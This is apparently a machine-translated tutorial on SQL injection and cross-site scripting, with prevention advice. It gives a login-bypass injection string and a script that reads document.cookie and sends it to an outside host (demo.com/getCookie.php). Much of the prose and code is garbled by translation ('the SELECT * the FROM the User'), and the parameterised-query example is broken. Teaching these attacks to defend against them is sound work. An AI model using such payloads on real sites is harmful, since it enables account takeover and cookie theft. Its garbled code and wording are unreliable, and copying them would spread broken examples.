Introduction to SQL injection
SQL injection vulnerabilities (SQL Injection) Web development is the most common form of security vulnerabilities. You can use it to obtain sensitive information from the database, or use database features add a user to perform export documents and a series of malicious actions, there may even get a database system users and even the highest authority.
The cause of SQL injection is effective because the program did not escape the filter user input could allow an attacker who successfully submit a malicious SQL query code to the server, the program will enter after receiving the wrong attacker executed as part of the query , resulting in the original query logic is changed, additional execution of the attacker crafted malicious code.
Many Web developers do not realize how SQL queries can be tampered with, so that an SQL query is a trusted command. As everyone knows, SQL queries can circumvent access controls, thereby bypassing standard authentication and authorization checks. What is more, it is possible to run a query to the host system level commands through SQL.
SQL injection principle
will be through some real-life examples to explain in detail the principles of SQL injection methods.
Consider the following simple administrator login form:
<form action="/login" method="POST">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<p><input type="submit" value="登陆" /></p>
</form>
后端的 SQL 语句可能是如下这样的:
querySQL = `the let
the SELECT *
the FROM the User
the WHERE username = '$ {username}'
the AND PSW = '$ {password}'
`;
// The next step is the implementation of sql statements ...
aim is to verify the user name and password are not correct, It stands to reason at first glance the above SQL statement is also nothing wrong, really it is able to achieve our objective, but you just stand angle can honestly user to enter the design according to your point of view the problem, if there is a malicious attacker entered username is zhangsan 'OR 1 = 1 -, optionally enter a password, the system can log straightforward.
Calm down and think about, before we expected SQL statement is true:
* The FROM the User the WHERE username the SELECT = 'zhangsan' the AND PSW = 'mypassword'
1
may be a malicious attacker's strange user name of your SQL statement into a form as follows:
* The FROM the User the WHERE username the SELECT = 'zhangsan' OR 1 = 1 - 'the AND PSW =' xxxx '
1
in SQL - is the content of the meaning behind the notes, so the query becomes:
The SELECT * the FROM the User the WHERE username = 'zhangsan' OR 1 = 1
1
query this SQL statement is always true, it means that malicious attackers without my password, you can log into my account, then you can do whatever they want in there However, this is only the most simple injection, regressed SQL injection experts can even go run a query-level host system via SQL commands, the contents of your host glance, here I do not have the ability to explain too deep, after all not a professional study of such attacks, but the above example, SQL injection principle already know, we have been able to find basic SQL injection defense of the program.
Prevent SQL injection
to prevent SQL injection is mainly logical content can not allow user input to affect the normal SQL statement, when the information input by the user will be used to splice SQL statements, we should always choose not to believe that any content must be escaped filter, of course, to do this is not enough, here are a few precautions defense SQL injection:
Web application strictly limited authority to operate the database, to provide the user only able to meet their minimum rights work, which minimize harm to injection attacks on the database
if the back-end data entered are checked in line with expectations, strict restrictions on the type of variable , for example, a number of regular expressions matching process.
Special characters ( ', ", \, <,>, &, * ,; etc.) escaping into the database, or code conversion. Languages have substantially all of the rear end of the string of escaping methods, such as lodash of lodash._escapehtmlchar library.
All of the query is recommended to use parameterized query interface provided by the database, parameterized statements use parameters instead of embedding user input variables to the SQL statements that do not directly spliced SQL statements. For example ?. query method of mysqljs Node.js library's placeholder parameters
mysql.query (the FROM `the SELECT * the User the WHERE username = =` the AND PSW, [username, PSW]??);
1
is recommended prior to application release professional SQL injection detection tools for testing, and when the repair was found SQL injection vulnerability. there are many online this regard open source tools, such as sqlmap, SQLninja etc.
avoid sites print out the SQL error message, such as the type of error, fields do not match, etc. , the code in the SQL statement exposed, in order to prevent an attacker using SQL injection error messages.
error believed not to be too refined return If the aim is to facilitate debugging, went to use the rear log, do not expose too much of the wrong information on the interface, after all, the real user does not care too much technical detail, then surgery is reasonable as long as the line.
XSS attack Introduction
XSS attacks that cross-site scripting attacks (Cross Site Scripting), it is the common web application vulnerabilities. The principle is the attacker to script code (CSS codes, JavaScript code, etc.) web pages to insert malicious when users browse the page, embedded script code will be executed, so as to achieve the purpose of malicious users. Such as steal user cookie, destruction of the page structure, redirected to other websites.
In theory, web pages everywhere input by the user, without the input data filtering process, then there will XSS vulnerabilities; of course, we also need to filter the output data template view.
XSS attacks example
there is a blog website that offers a web page (containing form) to all users published blog, but the blog site form data developers are not submitted by a user to do any filtering process. Now, I'm an attacker, published a blog on the blog site for other users to steal cookie information. Blog reads as follows:
<B> This IS XSS Test A </ B>!
<Script>
var = Cookie the document.cookie;
the window.open ( "http://demo.com/getCookie.php?param=" Cookie +);
</ Script >
this is a XSS attack code. When other users to view my blog this, their cookie data will be sent to my web site (http://demo.com/), so I'll steal another user's cookie information.
Prevent XSS attacks
the core idea
never trust user input, you must make filtering the input data.
This function will parse the special characters into HTML entities, so that when the output of the malicious code can not be executed. These special characters are mainly ' "& <>.
For example, I just malicious code is filtered, it will change to the following code:
lt &; B & gt; Test This XSS IS A & lt; / B & gt;!
& lt; Script & gt;
var = Cookie the document.cookie;
the window.open (& quot; HTTP: //demo.com/getCookie.php param = & quot; Cookie +? );
& lt; / Script & gt;
Thus, it can prevent the majority of XSS attacks.